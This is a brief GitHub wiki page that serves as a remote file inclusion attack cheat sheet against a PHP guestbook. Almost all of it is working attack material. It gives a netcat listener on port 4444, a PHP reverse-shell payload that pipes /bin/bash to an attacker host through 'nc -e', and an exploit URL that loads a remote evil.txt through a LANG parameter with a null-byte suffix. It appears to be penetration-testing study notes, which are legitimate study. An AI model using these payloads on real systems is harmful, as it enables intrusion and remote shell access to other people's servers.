-
Notifications
You must be signed in to change notification settings - Fork 14
Web_RFI
lethanhtung01011980 edited this page Dec 30, 2019
·
5 revisions
- Execute evil code from remote file
- Listen at port 4444: nc -nlvp 4444
- To create evil code to contain to-be-executed-code. It should be a reverse shell code, btw:
<?php echo shell_exec("nc -nv attacker-ip 4444 -e /bin/bash");?>
- To execute remote code
http://victim_ip/addguestbook.php?name=a&comment=b&LANG=http://attacker_ip/evil.txt%00